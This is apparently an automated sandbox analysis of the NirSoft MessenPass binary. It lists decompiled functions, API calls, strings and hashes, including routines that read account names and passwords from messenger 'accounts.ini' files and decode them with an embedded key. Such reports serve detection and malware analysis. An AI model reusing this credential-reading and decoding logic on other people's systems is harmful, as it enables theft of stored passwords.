				_t209[0xc] = 0;
				_t209[0xc] = 0;
				_t209[0xc] = 0;
				asm("stosd");
				asm("stosd");
				_t209[0xf] = 3;
				_t209[0x10] = 0x9c49;
				_t209[0x11] = 4;
				_t209[0x11] = 0;
				_t209[0x11] = 0;
				_t209[0x11] = 0;
				asm("stosd");
				asm("stosd");
				_t209[0x14] = 4;
				_t209[0x15] = 0x9c42;
				_t209[0x16] = 4;
				_t209[0x16] = 0;
				_t209[0x16] = 0;
				_t209[0x16] = 0;
				asm("stosd");
				_t196 = 0x66;
				asm("stosd");
				_t115 = E00408A29(_t196);
				 *(__ecx + 0x11c) = _t115;
				SetMenu( *(__ecx + 0x108), _t115);
				_t117 =  *0x41502c(0x50000000, 0x417c88,  *(_t165 + 0x108), 0x101, _t185, _t195, _t164);
				 *(_t165 + 0x114) = _t117;
				SendMessageA(_t117, 0x404, 1,  &(_t209[0x1b]));
				_t119 = LoadImageA( *0x41dbd4, 0x68, 0, 0, 0, 0x9060);
				 *((intOrPtr*)(_t165 + 0x118)) =  *0x415044( *(_t165 + 0x108), 0x50010900, 0x102, 7, 0, _t119, _t209 - 0x28, 7, 0x10, 0x10, 0x70, 0x10, 0x14);
				E00403CB2( *((intOrPtr*)(_t165 + 0x390)), _t214, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t165 + 0x108), 0x103,  *0x41dbd4, 0), 1);
				_t123 =  *((intOrPtr*)(_t165 + 0x390));
				_t170 =  *(_t123 + 0x1b0);
				_t198 =  *((intOrPtr*)(_t123 + 0x1b4));
				_t209[0x1c] =  *(_t123 + 0x184);
				if(_t170 <= 0) {
					L3:
					_t199 =  *((intOrPtr*)(_t165 + 0x390));
					E0040AC28(_t199);
					 *0x415040( *((intOrPtr*)(_t199 + 0x18c)), 0);
					_t128 = E00407017(0x6d);
					_t171 = 0xffffff;
					_t129 =  *0x41503c( *((intOrPtr*)(_t199 + 0x18c)), _t128);
					if( *((intOrPtr*)(_t199 + 0x1b8)) != 0) {
						E0040AB96(_t129, _t171, 0, _t199);
					}
					_t200 = 0x68;
					 *((intOrPtr*)(_t165 + 0x170)) = E00408A29(_t200);
					_t131 =  *((intOrPtr*)(_t165 + 0x398));
					if( *((intOrPtr*)(_t131 + 0x30)) <= 0) {
						_t172 = 0x417c88;
					} else {
						if( *((intOrPtr*)(_t131 + 0x1c)) <= 0) {
							_t172 = 0;
						} else {
							_t172 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xc)))) +  *((intOrPtr*)(_t131 + 0x10));
						}
					}
					0x413dce(_t172, "/noloadsettings");
					_t221 = _t131;
					if(_t131 == 0) {
						RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
					}
					_t201 = _t165 + 0x38c;
					E0040D725( *_t201, _t221);
					E0040BBF0(_t165, 0);
					 *( *_t201 + 0x724) = 1;
					SetFocus( *( *((intOrPtr*)(_t165 + 0x390)) + 0x184));
					if( *0x41e678 == 0) {
						E004069FA(0x41e678);
						if((GetFileAttributesA(0x41e678) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x41e678);
						}
					}
					_t203 = strlen(0x41e678);
					 *_t212 = 0x4185dc;
					_t94 = strlen(??) + 1; // 0x1
					_t224 = _t203 + _t94 - 0x104;
					if(_t203 + _t94 >= 0x104) {
						 *((char*)(_t165 + 0x180)) = 0;
					} else {
						E00406B4B(_t165 + 0x180, 0x41e678, "report.html");
					}
					_push(1);
					_t176 = 0x30;
					E0040AD6F( *((intOrPtr*)(_t165 + 0x390)), _t176);
					E0040B4DB(_t165);
					 *((intOrPtr*)(_t165 + 0x394)) = RegisterClipboardFormatA("commdlg_FindReplace");
					E0040AFE6(_t176, _t165, _t224, 0);
					if(E004077AF( *((intOrPtr*)(_t165 + 0x398)), ?str?, 3) >= 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x390)) + 0x1c8)) = E00406D5A(E0040779F(_t148,  *((intOrPtr*)(_t165 + 0x398))) + 3);
					}
					_t209[0x19] = 0x12c;
					_t209[0x1a] = 0x400;
					SendMessageA( *(_t165 + 0x114), 0x404, 2,  &(_t209[0x19]));
					return SendMessageA( *(_t165 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t208 = _t198 + 0xc;
					_t209[0x1d] = _t170;
					do {
						E00404E68( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 - 8)), _t209[0x1c],  *((intOrPtr*)(_t208 - 0xc)),  *((intOrPtr*)(_t208 - 4)),  *_t208);
						_t212 = _t212 + 0x10;
						_t208 = _t208 + 0x14;
						_t75 =  &(_t209[0x1d]);
						 *_t75 = _t209[0x1d] - 1;
					} while ( *_t75 != 0);
					goto L3;
				}
			}































                                          0x0040b4f6
                                          0x0040b4f7
                                          0x0040b4fb
                                          0x0040b504
                                          0x0040b506
                                          0x0040b50a
                                          0x0040b50e
                                          0x0040b512
                                          0x0040b516
                                          0x0040b51a
                                          0x0040b523
                                          0x0040b524
                                          0x0040b525
                                          0x0040b52c
                                          0x0040b533
                                          0x0040b537
                                          0x0040b53b
                                          0x0040b53f
                                          0x0040b548
                                          0x0040b549
                                          0x0040b54a
                                          0x0040b551
                                          0x0040b558
                                          0x0040b55c
                                          0x0040b560
                                          0x0040b564
                                          0x0040b56d
                                          0x0040b56e
                                          0x0040b56f
                                          0x0040b576
                                          0x0040b57d
                                          0x0040b581
                                          0x0040b585
                                          0x0040b589
                                          0x0040b58f
                                          0x0040b596
                                          0x0040b597
                                          0x0040b598
                                          0x0040b59f
                                          0x0040b5a6
                                          0x0040b5aa
                                          0x0040b5ae
                                          0x0040b5b2
                                          0x0040b5bb
                                          0x0040b5bc
                                          0x0040b5bd
                                          0x0040b5c4
                                          0x0040b5cb
                                          0x0040b5cf
                                          0x0040b5d3
                                          0x0040b5d7
                                          0x0040b5e0
                                          0x0040b5e1
                                          0x0040b5e2
                                          0x0040b5e9
                                          0x0040b5f0
                                          0x0040b5f4
                                          0x0040b5f8
                                          0x0040b5fc
                                          0x0040b605
                                          0x0040b608
                                          0x0040b609
                                          0x0040b60a
                                          0x0040b616
                                          0x0040b61c
                                          0x0040b637
                                          0x0040b649
                                          0x0040b64f
                                          0x0040b667
                                          0x0040b69e
                                          0x0040b6d6
                                          0x0040b6db
                                          0x0040b6e1
                                          0x0040b6e9
                                          0x0040b6f5
                                          0x0040b6f8
                                          0x0040b721
                                          0x0040b721
                                          0x0040b729
                                          0x0040b735
                                          0x0040b742
                                          0x0040b747
                                          0x0040b74f
                                          0x0040b75b
                                          0x0040b75d
                                          0x0040b75d
                                          0x0040b764
                                          0x0040b76a
                                          0x0040b770
                                          0x0040b779
                                          0x0040b78e
                                          0x0040b77b
                                          0x0040b77e
                                          0x0040b78a
                                          0x0040b780
                                          0x0040b785
                                          0x0040b785
                                          0x0040b77e
                                          0x0040b799
                                          0x0040b79e
                                          0x0040b7a2
                                          0x0040b7ae
                                          0x0040b7ae
                                          0x0040b7b4
                                          0x0040b7bc
                                          0x0040b7c4
                                          0x0040b7cb
                                          0x0040b7e1
                                          0x0040b7f3
                                          0x0040b7f5
                                          0x0040b803
                                          0x0040b80b
                                          0x0040b80b
                                          0x0040b803
                                          0x0040b817
                                          0x0040b819
                                          0x0040b825
                                          0x0040b829
                                          0x0040b82f
                                          0x0040b84a
                                          0x0040b831
                                          0x0040b841
                                          0x0040b847
                                          0x0040b857
                                          0x0040b85b
                                          0x0040b85c
                                          0x0040b863
                                          0x0040b876
                                          0x0040b87c
                                          0x0040b895
                                          0x0040b8b2
                                          0x0040b8b2
                                          0x0040b8cf
                                          0x0040b8d6
                                          0x0040b8dd
                                          0x0040b8f9
                                          0x0040b6fa
                                          0x0040b6fa
                                          0x0040b6fd
                                          0x0040b700
                                          0x0040b711
                                          0x0040b716
                                          0x0040b719
                                          0x0040b71c
                                          0x0040b71c
                                          0x0040b71c
                                          0x00000000
                                          0x0040b700

                                          APIs
                                            • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
                                            • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
                                          • SetMenu.USER32(?,00000000), ref: 0040B61C
                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
                                          • _strcmpi.MSVCRT ref: 0040B799
                                          • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
                                          • SetFocus.USER32(?), ref: 0040B7E1
                                          • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
                                          • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
                                          • strlen.MSVCRT ref: 0040B812
                                          • strlen.MSVCRT ref: 0040B820
                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
                                            • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
                                            • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
                                          • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html$xA
                                          • API String ID: 2862451953-132385428
                                          • Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                          • Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
                                          • Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                          • Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F689, Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 192COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040F94E: SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,73BCF560), ref: 0040F968
                                            • Part of subcall function 0040F94E: memset.MSVCRT ref: 0040F973
                                          • _strcmpi.MSVCRT ref: 0040F729
                                          • _strcmpi.MSVCRT ref: 0040F740
                                          • _strcmpi.MSVCRT ref: 0040F757
                                          • _strcmpi.MSVCRT ref: 0040F76E
                                          • _strcmpi.MSVCRT ref: 0040F792
                                          • _strcmpi.MSVCRT ref: 0040F7A6
                                          • _strcmpi.MSVCRT ref: 0040F7BA
                                          • _strcmpi.MSVCRT ref: 0040F7CE
                                          • _strcmpi.MSVCRT ref: 0040F7E2
                                          • _mbscpy.MSVCRT ref: 0040F831
                                          • _strcmpi.MSVCRT ref: 0040F843
                                          • _mbscpy.MSVCRT ref: 0040F88E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$_mbscpy$FilePointermemset
                                          • String ID: LoginName$UIN$e-mail$gg_1$icq$icq_1$password$yahoo_id
                                          • API String ID: 3770779768-1670397801
                                          • Opcode ID: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                          • Instruction ID: 0cc2e13a8e56b2c188e74045540a3fe2ab2ea4ed6cca8b10f1d7ecee0d286665
                                          • Opcode Fuzzy Hash: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                          • Instruction Fuzzy Hash: 795177725043096EEB21DAA2DC81EEA73AC9F04715F60447FF505E25C1EB38EB89879D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040244D, Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 132COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E0040244D(short* _a4, short* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				void _v60;
				intOrPtr _v64;
				char _v68;
				void _v1091;
				char _v1092;
				char _v2108;
				void _v2116;
				void* __edi;
				char _t82;
				void* _t89;
				short* _t90;
				void* _t92;
				intOrPtr _t102;
				short* _t103;
				void* _t104;
				intOrPtr* _t105;

				_v1092 = 0;
				memset( &_v1091, 0, 0x3ff);
				_t105 = _t104 + 0xc;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v1092, 0x400, 0, 0);
				_t82 = E004029D9( &_v1092,  &_v2116, 0x400);
				_t102 = _t82;
				_pop(_t92);
				if(_t102 > 8) {
					0x413d5c(0x48);
					_v68 = _t82;
					 *_t105 = 0x1000;
					0x413d5c();
					_v64 = _t82;
					_v60 = 0;
					_v59 = 0;
					_v58 = 0;
					_v57 = 0;
					_v56 = 0;
					_v55 = 0;
					_v54 = 0;
					_v53 = 0;
					_v52 = 0x99;
					_v51 = 0;
					_v50 = 0x86;
					_v49 = 0xa5;
					_v48 = 0x27;
					_v47 = 0xaa;
					_v46 = 0x9d;
					_v45 = 0x7f;
					_v44 = 0x58;
					_v43 = 0xaa;
					_v42 = 0xae;
					_v41 = 0xb9;
					_v40 = 0xb;
					_v39 = 0x47;
					_v38 = 0x3a;
					_v37 = 0x35;
					_v36 = 0xaa;
					_v35 = 0xe0;
					_v34 = 0xea;
					_v33 = 0x95;
					_v32 = 0x66;
					_v31 = 0xfb;
					_v30 = 0xe4;
					_v29 = 0x9f;
					_v28 = 0xcb;
					_v27 = 0xf7;
					_v26 = 0x16;
					_v25 = 0x1c;
					_v24 = 0xa3;
					_v23 = 0x92;
					_v22 = 0xe6;
					_v21 = 0x1c;
					_v20 = 0x96;
					_v19 = 6;
					_v18 = 0x9b;
					_v17 = 0x5b;
					_v16 = 0x29;
					_v15 = 0x30;
					_v14 = 0xbf;
					_v13 = 0xaf;
					_v12 = 0xec;
					_v11 = 0x11;
					_v10 = 0x29;
					_v9 = 0xc8;
					_v8 = 0x89;
					_v7 = 0x5b;
					_v6 = 0xb8;
					_v5 = 0x57;
					memcpy( &_v60,  &_v2116, 8);
					E00403632(_t92,  &_v68,  &_v60);
					_t70 = _t102 - 8; // -8
					_t88 = _t70;
					if(_t70 > 0x1fe) {
						_t88 = 0x1fe;
					}
					_t103 = _a4;
					_t89 = E0040373E(_t88, _t103,  &_v2108,  &_v68);
					 *((short*)(_t103 + 0x1fe)) = 0;
					0x413d56(_v68);
					0x413d56(_v64);
					return _t89;
				}
				_t90 = _a4;
				 *_t90 = 0;
				return _t90;
			}










































































                                          0x00402468
                                          0x0040246e
                                          0x00402473
                                          0x0040248c
                                          0x0040249f
                                          0x004024a4
                                          0x004024a9
                                          0x004024aa
                                          0x004024b9
                                          0x004024be
                                          0x004024c1
                                          0x004024c8
                                          0x004024cd
                                          0x004024dd
                                          0x004024e0
                                          0x004024e3
                                          0x004024e6
                                          0x004024e9
                                          0x004024ec
                                          0x004024ef
                                          0x004024f2
                                          0x004024f5
                                          0x004024f9
                                          0x004024fc
                                          0x00402500
                                          0x00402504
                                          0x00402508
                                          0x0040250c
                                          0x00402510
                                          0x00402514
                                          0x00402518
                                          0x0040251c
                                          0x00402520
                                          0x00402524
                                          0x00402528
                                          0x0040252c
                                          0x00402530
                                          0x00402534
                                          0x00402538
                                          0x0040253c
                                          0x00402540
                                          0x00402544
                                          0x00402548
                                          0x0040254c
                                          0x00402550
                                          0x00402554
                                          0x00402558
                                          0x0040255c
                                          0x00402560
                                          0x00402564
                                          0x00402568
                                          0x0040256c
                                          0x00402570
                                          0x00402574
                                          0x00402578
                                          0x0040257c
                                          0x00402580
                                          0x00402584
                                          0x00402588
                                          0x0040258c
                                          0x00402590
                                          0x00402594
                                          0x00402598
                                          0x0040259c
                                          0x004025a0
                                          0x004025a4
                                          0x004025a8
                                          0x004025ac
                                          0x004025b0
                                          0x004025b4
                                          0x004025c3
                                          0x004025c8
                                          0x004025c8
                                          0x004025d2
                                          0x004025d4
                                          0x004025d4
                                          0x004025d6
                                          0x004025e5
                                          0x004025ed
                                          0x004025f4
                                          0x004025fc
                                          0x00000000
                                          0x00402602
                                          0x004024ac
                                          0x004024af
                                          0x00000000

                                          APIs
                                          • memset.MSVCRT ref: 0040246E
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
                                            • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
                                          • memcpy.MSVCRT ref: 004025B4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004025F4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004025FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
                                          • String ID: '$)$)$0$5$:$G$W$X$[$[$f
                                          • API String ID: 3606715663-4187034442
                                          • Opcode ID: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                          • Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
                                          • Opcode Fuzzy Hash: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                          • Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E0A1, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 142stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E0040E0A1(intOrPtr* _a4, char* _a8) {
				char* _v8;
				void _v275;
				char _v276;
				void _v531;
				char _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				int _v796;
				int _v1052;
				void _v2075;
				char _v2076;
				void _v3099;
				int _v3100;
				void _v4123;
				int _v4124;
				void _v5147;
				char _v5148;
				void* __ebx;
				void* __edi;
				int _t50;
				char* _t54;
				int _t89;
				int* _t105;
				void* _t110;
				void* _t111;

				0x414060();
				_t89 = 0;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_t50 = strlen(_a8);
				_t5 = strlen("accounts.ini") + 1; // 0x1
				_t111 = _t110 + 0x14;
				if(_t50 + _t5 >= 0x104) {
					_v276 = 0;
				} else {
					E00406B4B( &_v276, _a8, "accounts.ini");
				}
				_t54 = GetPrivateProfileIntA("Accounts", "num", _t89,  &_v276);
				_v8 = _t54;
				_a8 = _t89;
				if(_t54 > _t89) {
					do {
						_v532 = _t89;
						memset( &_v531, _t89, 0xfe);
						_v5148 = _t89;
						memset( &_v5147, _t89, 0x3ff);
						_v2076 = _t89;
						memset( &_v2075, _t89, 0x3ff);
						_v3100 = _t89;
						memset( &_v3099, _t89, 0x3ff);
						_v4124 = _t89;
						memset( &_v4123, _t89, 0x3ff);
						_push(_a8);
						sprintf( &_v532, "Account%3.3d");
						_t111 = _t111 + 0x48;
						GetPrivateProfileStringA( &_v532, "Account", 0x417c88,  &_v5148, 0x3ff,  &_v276);
						GetPrivateProfileStringA( &_v532, "Password", 0x417c88,  &_v2076, 0x3ff,  &_v276);
						if(_v2076 != _t89) {
							E004029D9( &_v2076,  &_v3100, 0x3ff);
							E0040DCF2( &_v4124,  &_v3100);
							_v1052 = _t89;
							_v796 = _t89;
							_v536 = 0xf;
							_v540 = 0x15;
							E00406958(0xff,  &_v796,  &_v4124);
							_t105 =  &_v1052;
							E00406958(0xff, _t105,  &_v5148);
							 *((intOrPtr*)( *_a4))(_t105);
							_t89 = 0;
						}
						_a8 =  &(_a8[1]);
						_t54 = _a8;
					} while (_t54 < _v8);
				}
				return _t54;
			}




























                                          0x0040e0a9
                                          0x0040e0b6
                                          0x0040e0c1
                                          0x0040e0c7
                                          0x0040e0cf
                                          0x0040e0e0
                                          0x0040e0e4
                                          0x0040e0e9
                                          0x0040e102
                                          0x0040e0eb
                                          0x0040e0f9
                                          0x0040e0ff
                                          0x0040e11a
                                          0x0040e122
                                          0x0040e125
                                          0x0040e128
                                          0x0040e133
                                          0x0040e140
                                          0x0040e146
                                          0x0040e154
                                          0x0040e15a
                                          0x0040e168
                                          0x0040e16e
                                          0x0040e17c
                                          0x0040e182
                                          0x0040e190
                                          0x0040e196
                                          0x0040e19b
                                          0x0040e1aa
                                          0x0040e1b5
                                          0x0040e1d8
                                          0x0040e1fa
                                          0x0040e202
                                          0x0040e211
                                          0x0040e221
                                          0x0040e22c
                                          0x0040e232
                                          0x0040e244
                                          0x0040e24e
                                          0x0040e258
                                          0x0040e264
                                          0x0040e26a
                                          0x0040e279
                                          0x0040e27b
                                          0x0040e27b
                                          0x0040e27d
                                          0x0040e280
                                          0x0040e283
                                          0x0040e133
                                          0x0040e290

                                          APIs
                                          • memset.MSVCRT ref: 0040E0C7
                                          • strlen.MSVCRT ref: 0040E0CF
                                          • strlen.MSVCRT ref: 0040E0DB
                                          • GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
                                          • memset.MSVCRT ref: 0040E146
                                          • memset.MSVCRT ref: 0040E15A
                                          • memset.MSVCRT ref: 0040E16E
                                          • memset.MSVCRT ref: 0040E182
                                          • memset.MSVCRT ref: 0040E196
                                          • sprintf.MSVCRT ref: 0040E1AA
                                          • GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
                                          • GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
                                          • String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
                                          • API String ID: 1850607429-3672167483
                                          • Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                          • Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
                                          • Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                          • Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040EE6A, Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: aim$aim_1$gg_1$icq$icq_1$jabber$jabber_1$msn$msn_1$yahoo
                                          • API String ID: 1439213657-55676784
                                          • Opcode ID: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                          • Instruction ID: d6ea28dcef1c43b6611216e97a84ccd45a66baff8fdfae9b3007c4cad2cc92f3
                                          • Opcode Fuzzy Hash: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                          • Instruction Fuzzy Hash: 2F31307324E3127AF714B9336D02BEB27898F11B66F24082FFA09B11C1EE7D5A55419E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004124D4, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 633282248-1996832678
                                          • Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                          • Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
                                          • Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                          • Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A242, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E0040A242(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* _t83;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr* _t112;
				signed int _t113;
				intOrPtr _t131;
				signed int _t144;
				signed int _t145;
				signed int _t148;
				intOrPtr* _t149;
				void* _t150;
				void* _t152;

				_t112 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t113 = 0xc;
				memcpy( &_v236, 0x418424, _t113 << 2);
				asm("movsb");
				_t148 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t152 = _t150 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					0x41241f(_t83,  &_v492);
					_push(_t83);
					sprintf( &_v132, " bgcolor="%s"");
					_t152 = _t152 + 0x14;
				}
				E004067EC(_a4, "<table border="1" cellpadding="5">");
				_v8 = _t148;
				if( *((intOrPtr*)(_t112 + 0x20)) > _t148) {
					while(1) {
						_t144 =  *( *((intOrPtr*)(_t112 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t144 << 4) +  *((intOrPtr*)(_t112 + 0x34)) + 4)) != _t148) {
							0x413d0c( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t148;
						_t149 = _a8;
						 *((intOrPtr*)( *_t112 + 0x30))(5, _v8, _t149,  &_v28);
						0x41241f(_v28,  &_v184);
						 *((intOrPtr*)( *_t149))(_t144,  *(_t112 + 0x4c));
						0x41244b();
						 *((intOrPtr*)( *_t112 + 0x48))( *((intOrPtr*)(_t112 + 0x50)), _t149, _t144);
						_t98 =  *((intOrPtr*)( *_t112 + 0x14))();
						_t145 = _t144 * 0x14;
						if(_t98 == 0xffffffff) {
							0x413d0c( *(_t112 + 0x54),  *((intOrPtr*)(_t145 + _v12 + 0x10)));
						} else {
							0x41241f(_t98,  &_v492,  *((intOrPtr*)(_t145 + _v12 + 0x10)));
							_push(_t98);
							sprintf( *(_t112 + 0x54), "<font color="%s">%s</font>");
							_t152 = _t152 + 0x10;
						}
						_t100 =  *((intOrPtr*)(_t112 + 0x50));
						_t131 =  *_t100;
						if(_t131 == 0 || _t131 == 0x20) {
							0x413cf4(_t100, "&nbsp;");
						}
						0x4124d4( *((intOrPtr*)(_t112 + 0x58)),  *((intOrPtr*)(_t112 + 0x50)));
						sprintf( *(_t112 + 0x4c),  &_v236,  &_v132,  *(_t112 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t112 + 0x58)));
						E004067EC(_a4,  *(_t112 + 0x4c));
						_t152 = _t152 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t112 + 0x20))) {
							goto L14;
						}
						_t148 = 0;
					}
				}
				L14:
				E004067EC(_a4, "</table><p>");
				return E004067EC(_a4, 0x417de8);
			}






























                                          0x0040a242
                                          0x0040a25b
                                          0x0040a262
                                          0x0040a269
                                          0x0040a275
                                          0x0040a277
                                          0x0040a27a
                                          0x0040a281
                                          0x0040a285
                                          0x0040a294
                                          0x0040a29b
                                          0x0040a2a7
